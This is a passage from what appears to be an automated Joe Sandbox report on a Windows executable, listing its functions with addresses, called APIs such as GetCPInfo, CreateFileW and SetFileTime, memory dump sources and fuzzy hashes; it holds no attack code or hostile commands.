                                                                                                                                        • Instruction ID: 5e09cd894408e2792ca2725f4f64e764cad08ec44ce87a7e14a823c4041baa60
                                                                                                                                        • Opcode Fuzzy Hash: d07fcfc3f9a10f7baae7831d9b4d1ccb8e759646ec55111c94d908190c64984c
                                                                                                                                        • Instruction Fuzzy Hash: C861CFB1104F44AADF21DF74EC55AE7B7E8AF14301F444A2EE1AB87142DB3A6A48CF50
                                                                                                                                        Function 007B82C3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 007B82E8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Info
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                                                        • Opcode ID: 05e8ac6e7e94eca3b3148487f67566cb1f0ee34accff27fc4ab1091def0211c7
                                                                                                                                        • Instruction ID: 20acab05d24b8f9d510848de8ecd71a559432ce59fcef4eb6d39ef624b96ec92
                                                                                                                                        • Opcode Fuzzy Hash: 05e8ac6e7e94eca3b3148487f67566cb1f0ee34accff27fc4ab1091def0211c7
                                                                                                                                        • Instruction Fuzzy Hash: F741197050428C9BDB228E24CC84BFABBFDEB45704F5404EDE59A87142EA399985CF61
                                                                                                                                        Function 00791DA1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00791DA6
                                                                                                                                          • Part of subcall function 00793AA3: __EH_prolog.LIBCMT ref: 00793AA8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID: CMT
                                                                                                                                        • API String ID: 3519838083-2756464174
                                                                                                                                        • Opcode ID: bf77d044384b7ee9f31d17eda73485019fd8a045f36760ea5e7f86a6a77d92a0
                                                                                                                                        • Instruction ID: 3375a7d93d315faca07a304cfd7a4ee2ff07fbe22f022bf31467cc754439bd99
                                                                                                                                        • Opcode Fuzzy Hash: bf77d044384b7ee9f31d17eda73485019fd8a045f36760ea5e7f86a6a77d92a0
                                                                                                                                        • Instruction Fuzzy Hash: 1C21393690020ADFCF15EF98D9499EEFBF6AF48300B500569F845A3251CB3A5A20CBA0
                                                                                                                                        Function 007918FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID: CMT
                                                                                                                                        • API String ID: 3519838083-2756464174
                                                                                                                                        • Opcode ID: d99f3b02ccdbf2e51a972f4b3763438e57f84597111effe2b2b2af170aaf7416
                                                                                                                                        • Instruction ID: ba47cdee7c8a4558e5b01c34ca7c88cfed0604b035b2774cd3e3f6aede1faeeb
                                                                                                                                        • Opcode Fuzzy Hash: d99f3b02ccdbf2e51a972f4b3763438e57f84597111effe2b2b2af170aaf7416
                                                                                                                                        • Instruction Fuzzy Hash: 9911D6B1A00242EFDF04DF65E4959BEF7AEFF85310F44405AE4459B241DB38A961CBA0
                                                                                                                                        Function 007B7A09 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,F5E85006,00000001,?,000000FF), ref: 007B7A7A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: String
                                                                                                                                        • String ID: LCMapStringEx
                                                                                                                                        • API String ID: 2568140703-3893581201
                                                                                                                                        • Opcode ID: 7560fa775b3db138547ef0d1b2b5dd06dbd57cf3b2e689bf92d5d8db28cecd03
                                                                                                                                        • Instruction ID: 1ce28d476bb6703ebe5bd1ea4522c7980c6b6b46421248cf37280f6c81a386d3
                                                                                                                                        • Opcode Fuzzy Hash: 7560fa775b3db138547ef0d1b2b5dd06dbd57cf3b2e689bf92d5d8db28cecd03
                                                                                                                                        • Instruction Fuzzy Hash: 8501257250020DFBCF06AFA4DC49EEE7F62EF48710F008118FE0965160CA3A9A31EB84
                                                                                                                                        Function 007B79A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,007B709A), ref: 007B79F2
                                                                                                                                        Strings
                                                                                                                                        • InitializeCriticalSectionEx, xrefs: 007B79C2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                                                        • API String ID: 2593887523-3084827643
                                                                                                                                        • Opcode ID: 5ef5aaf7fc6d2bdcbe89b6b0abada8dbb45fce8e1e026be6f95f887e1e7866fe
                                                                                                                                        • Instruction ID: 0376f5aac17f9f1e2d73062527dc33f18dd36104a1f7d9d2aa890c2e0866b2a7
                                                                                                                                        • Opcode Fuzzy Hash: 5ef5aaf7fc6d2bdcbe89b6b0abada8dbb45fce8e1e026be6f95f887e1e7866fe
                                                                                                                                        • Instruction Fuzzy Hash: C1F0B47164520CFBCB156F60DC09EAEBF61EB44711B40812DFC156A160DE799E20D7C4
                                                                                                                                        Function 007B784C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Alloc
                                                                                                                                        • String ID: FlsAlloc
                                                                                                                                        • API String ID: 2773662609-671089009
                                                                                                                                        • Opcode ID: 222e0ca6cbe54dfbf5ad74747a842367d4780a22d71ec2e78ecb5cfef6d7da13
                                                                                                                                        • Instruction ID: 50896593e6e8af27c7a802dc2f7ab1bba02d470431be84bc02cbb7b80f39af3c
                                                                                                                                        • Opcode Fuzzy Hash: 222e0ca6cbe54dfbf5ad74747a842367d4780a22d71ec2e78ecb5cfef6d7da13
                                                                                                                                        • Instruction Fuzzy Hash: 77E0E5B4B45218BB8319AF649C4EFAEBBA4DB84B21F40816DFC0566251DD7D1E01C6C9
                                                                                                                                        Function 007B1D9A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • try_get_function.LIBVCRUNTIME ref: 007B1DAF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: try_get_function
                                                                                                                                        • String ID: FlsAlloc
                                                                                                                                        • API String ID: 2742660187-671089009
                                                                                                                                        • Opcode ID: deef05db039d85cd05cf9f3d18b6bdc680a9030bf44b162c744a7fc64707e3fd
                                                                                                                                        • Instruction ID: 40e47e0b91b21caac976be7dab35dc9946ee44bf00f7f06f4f62acaefe7ff2b2
                                                                                                                                        • Opcode Fuzzy Hash: deef05db039d85cd05cf9f3d18b6bdc680a9030bf44b162c744a7fc64707e3fd
                                                                                                                                        • Instruction Fuzzy Hash: 55D02B21B82328BB851036C0AC02FDEBF448B01FB1FC4407DFF0821143859D08004AD1
                                                                                                                                        Function 007ACD5C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 007ACD6E
                                                                                                                                          • Part of subcall function 007ACABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007ACB39
                                                                                                                                          • Part of subcall function 007ACABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007ACB4A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                        • String ID: 3Ro
                                                                                                                                        • API String ID: 1269201914-1492261280
                                                                                                                                        • Opcode ID: 735fe520f10644c2283f1cbadf964c76c1e1a147d11ddf15c108fb572ff3d53a
                                                                                                                                        • Instruction ID: 8df1be5bfd926348358c5f72dab165430c062ec19fe856302febf3a4c61b9909
                                                                                                                                        • Opcode Fuzzy Hash: 735fe520f10644c2283f1cbadf964c76c1e1a147d11ddf15c108fb572ff3d53a
                                                                                                                                        • Instruction Fuzzy Hash: B8B012C5369005FD336592049E06D3F130CC0C2F55330C27FF402D4040A84C0C038033
                                                                                                                                        Function 007B8618 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007B81EB: GetOEMCP.KERNEL32(00000000,?,?,007B8474,?), ref: 007B8216
                                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,007B84B9,?,00000000), ref: 007B868C
                                                                                                                                        • GetCPInfo.KERNEL32(00000000,007B84B9,?,?,?,007B84B9,?,00000000), ref: 007B869F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 546120528-0
                                                                                                                                        • Opcode ID: 3e58eed8b6d2f5c0c5dbcd84058e796ac28869c6e126746773e8e2d8c9b68f2c
                                                                                                                                        • Instruction ID: 455bb57e32179424be600f8afa936c82c611dad9163f095e196e17627f315aa9
                                                                                                                                        • Opcode Fuzzy Hash: 3e58eed8b6d2f5c0c5dbcd84058e796ac28869c6e126746773e8e2d8c9b68f2c
                                                                                                                                        • Instruction Fuzzy Hash: 8A5149709002499FDB608FB5C895BFBBBEDEF41318F28416ED0968B152DE3D9941CB92
                                                                                                                                        Function 00791383 Relevance: 3.1, APIs: 2, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00791383
                                                                                                                                          • Part of subcall function 00795FB1: __EH_prolog.LIBCMT ref: 00795FB6
                                                                                                                                          • Part of subcall function 0079C413: __EH_prolog.LIBCMT ref: 0079C418
                                                                                                                                          • Part of subcall function 0079C413: new.LIBCMT ref: 0079C45B
                                                                                                                                          • Part of subcall function 0079C413: new.LIBCMT ref: 0079C47F
                                                                                                                                        • new.LIBCMT ref: 007913FB
                                                                                                                                          • Part of subcall function 0079AC66: __EH_prolog.LIBCMT ref: 0079AC6B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: 81c8ecfa4f3f6ba238119a1f86a9aa0832008438ef15197ec438c698cee6965b
                                                                                                                                        • Instruction ID: bb9779935592db148aec83c5988c895f1d3ca7280726dde8a0a5af845091a45e
                                                                                                                                        • Opcode Fuzzy Hash: 81c8ecfa4f3f6ba238119a1f86a9aa0832008438ef15197ec438c698cee6965b
                                                                                                                                        • Instruction Fuzzy Hash: AD4158B0905B40DED720CF7984899E6FBE5FF29300F904A2ED5EE87282CB366564CB11
                                                                                                                                        Function 0079137E Relevance: 3.1, APIs: 2, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 00791383
                                                                                                                                          • Part of subcall function 00795FB1: __EH_prolog.LIBCMT ref: 00795FB6
                                                                                                                                          • Part of subcall function 0079C413: __EH_prolog.LIBCMT ref: 0079C418
                                                                                                                                          • Part of subcall function 0079C413: new.LIBCMT ref: 0079C45B
                                                                                                                                          • Part of subcall function 0079C413: new.LIBCMT ref: 0079C47F
                                                                                                                                        • new.LIBCMT ref: 007913FB
                                                                                                                                          • Part of subcall function 0079AC66: __EH_prolog.LIBCMT ref: 0079AC6B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3519838083-0
                                                                                                                                        • Opcode ID: 13868041f83fece33b1cbba4a4b926211032f783b3146aef9957a143b7cd0151
                                                                                                                                        • Instruction ID: abdaf34c710e2c011494efd7b0b35ad8cb3626fe9d53496497ba5472e89605c2
                                                                                                                                        • Opcode Fuzzy Hash: 13868041f83fece33b1cbba4a4b926211032f783b3146aef9957a143b7cd0151
                                                                                                                                        • Instruction Fuzzy Hash: 434149B0805B40DED721DF7984899E6FBE5FF29300F504A2ED5EE83282CB366564CB11
                                                                                                                                        Function 007B8457 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007B631F: GetLastError.KERNEL32(?,007CCBE8,007B2674,007CCBE8,?,?,007B2213,?,?,007CCBE8), ref: 007B6323
                                                                                                                                          • Part of subcall function 007B631F: _free.LIBCMT ref: 007B6356
                                                                                                                                          • Part of subcall function 007B631F: SetLastError.KERNEL32(00000000,?,007CCBE8), ref: 007B6397
                                                                                                                                          • Part of subcall function 007B631F: _abort.LIBCMT ref: 007B639D
                                                                                                                                          • Part of subcall function 007B8576: _abort.LIBCMT ref: 007B85A8
                                                                                                                                          • Part of subcall function 007B8576: _free.LIBCMT ref: 007B85DC
                                                                                                                                          • Part of subcall function 007B81EB: GetOEMCP.KERNEL32(00000000,?,?,007B8474,?), ref: 007B8216
                                                                                                                                        • _free.LIBCMT ref: 007B84CF
                                                                                                                                        • _free.LIBCMT ref: 007B8505
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorLast_abort
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2991157371-0
                                                                                                                                        • Opcode ID: caadadf3d94635201a87948b9ea502776b4909eea5cbc72f468ec80ad2eb3226
                                                                                                                                        • Instruction ID: 716afe4f0458389df0f2ccb240d71429ab3f9fe74f6c4e15176755ccd3e7fd69
                                                                                                                                        • Opcode Fuzzy Hash: caadadf3d94635201a87948b9ea502776b4909eea5cbc72f468ec80ad2eb3226
                                                                                                                                        • Instruction Fuzzy Hash: 6F31C231904249EFDB60EF68D545BDD77E9EF40321F254099E4049B291EF399E41CB52
                                                                                                                                        Function 007994F1 Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00799B87,?,?,00797735), ref: 00799579
                                                                                                                                        • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00799B87,?,?,00797735), ref: 007995AE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: f5f3520affd21fc833592edb96f7dfb2e4533f7dd616fa59c8f38f6cb6de8998
                                                                                                                                        • Instruction ID: 6a07e38e1694b90c15f452cf90908cff21c05af179b64e4ae2219bc2b3ee9378
                                                                                                                                        • Opcode Fuzzy Hash: f5f3520affd21fc833592edb96f7dfb2e4533f7dd616fa59c8f38f6cb6de8998
                                                                                                                                        • Instruction Fuzzy Hash: 6321E6B1004748EFEB318F18D845BA7B7E8EB49764F01492DF5D5821D1C278AD498AA1
                                                                                                                                        Function 00799A12 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,?,00797436,?,?,?), ref: 00799A2C
                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00799ADC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650067991.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650083963.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1650116974.00000000007EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_790000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$BuffersFlushTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1392018926-0
                                                                                                                                        • Opcode ID: 4608b219448123034d62deb99a9bc58591fdeb61e1ae919d27b97f8386491379
                                                                                                                                        • Instruction ID: bad6a36c07ab09936a213911a44e9fc6dce8dc8385b57e1b20769bc186984c1a
                                                                                                                                        • Opcode Fuzzy Hash: 4608b219448123034d62deb99a9bc58591fdeb61e1ae919d27b97f8386491379
                                                                                                                                        • Instruction Fuzzy Hash: 0A21D331158385AFEB11DE28E885AAABBD8EF96704F08891DF8C1C7181D72DED48C791
                                                                                                                                        Function 007B7735 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 007B7795
                                                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007B77A2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1650003628.0000000000791000.00000020.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1649955866.0000000000790000.00000002.00000001.01000000.00000003.sdmpDownload File
